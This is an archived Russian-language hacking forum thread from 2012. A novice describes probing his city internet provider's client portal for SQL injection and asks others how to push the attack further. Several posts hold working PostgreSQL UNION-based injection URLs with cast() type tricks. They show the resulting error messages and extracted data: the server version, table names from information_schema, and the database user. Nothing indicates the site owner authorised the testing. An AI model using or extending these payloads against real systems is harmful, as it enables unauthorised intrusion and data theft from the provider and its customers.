HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Помогите с SQL инъекцией на PostgreSQL
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.02.2012, 15:47
dcspirit
Guest
Сообщений: n/a
Провел на форуме:
2241

Репутация: 0
По умолчанию
В общем по сабжу.

В инъекциях практически 0.

Лазил по сайту своего городского прова.

В общем подставлял везде пробовал кавычки и т.д. (думал изучить как-раз для себя эту неизведанную степь -) )

И в 1 из результатов (http://site.com/BOSSclient/view_ctime.php3?Id=155348' )

Выдало такое:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в конце ввода LINE 1: SELECT single FROM sdesc WHERE idservice= ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23

Warning: pg_result(): supplied argument is not a valid PostgreSQL result resource in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 24

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в или рядом "AND" LINE 1: ...T oid,* FROM ctime WHERE Id=155348 AND idservice= AND cdate>... ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32

Как это дело раскрутить.

Погуглил, пробовал многими способами, которые нашел, но ошибки не меняются. Выдает только это.(Хотя может что-то и не так делал, т.к. в этом деле полный 0 )

Подскажите , куда копать , буду очень благодарен.

http://site.com/******/****_*****.php3?Id=155348' уязвимый урл .
 
Ответить с цитированием

  #2  
Старый 07.02.2012, 15:51
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию
https://rdot.org/forum/showthread.php?t=24
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #3  
Старый 07.02.2012, 15:54
dcspirit
Guest
Сообщений: n/a
Провел на форуме:
2241

Репутация: 0
По умолчанию
shell_c0de, спасибо большое!

Натыкался на эту статью, попробовал несколько моментов, но что-то не пошло.

Буду копать глубже в этом направлении.

Вот допустим пишу по примеру так :

http://site.com/BOSSclient/view_ctime.php3?Id=155348+and+1=cast((SELECT+versi on()||chr(58)||current_user||chr(58)||current_data base())+as+int)--

Выдает ту же ошибку (страница не меняется).

Перепробовал почти все с этой статьи. Ничего не меняется -(

Кто что может посоветовать.
 
Ответить с цитированием

  #4  
Старый 07.02.2012, 17:40
dcspirit
Guest
Сообщений: n/a
Провел на форуме:
2241

Репутация: 0
По умолчанию
В общем определил вывод и узнал кол-во столбцов, получилось так:

http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207 &isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,111,null,null,n ull--

Затем пробую узнать таблицу так:

http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207 &isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,TABLE_NAME,null ,null,null+from+information_schema.tables--

Выдает такие ошибки на странице :

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: каждый запрос UNION должен иметь одинаковое число колонок in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23

И снизу:

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: UNION типы double precision и character varying не совпадают in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32

Как быть дальше, не знаю. Помогите плиз!...) Буду очень благодарен.
 
Ответить с цитированием

  #5  
Старый 07.02.2012, 20:32
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
dcspirit, круто, конечно. Но у меня 401.
 
Ответить с цитированием

  #6  
Старый 07.02.2012, 22:17
dcspirit
Guest
Сообщений: n/a
Провел на форуме:
2241

Репутация: 0
По умолчанию
Там просто нужна авторизация.

Ну а по самой теме, что можно сделать ?(
 
Ответить с цитированием

  #7  
Старый 15.02.2012, 20:26
dcspirit
Guest
Сообщений: n/a
Провел на форуме:
2241

Репутация: 0
По умолчанию
Вот еще методом проб и ошибок-)

http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(version()+ as+double+precision),null,null,null--

Выдает нам версию - PostgreSQL 8.2.13 on amd64-portbld-freebsd7.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD]

http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(TABLE_NAME +as+double+precision),null,null,null+from+INFORMAT ION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--

Выдает нам имя таблицы 1 - "views" . Далее, наращивая OFFSET выдает эту же таблицу (хотя таблиц точнодольше должно быть!)

http://хххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215 &isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(cast(user+ as+text)+as+double+precision),null,null,null+from+ INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1--

Так узнаем свои права (по ходу дела, как я понял -) )

- "nobody"

Т.е. прав нет считай?

Подскажите, что можно сделать в данном случае...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ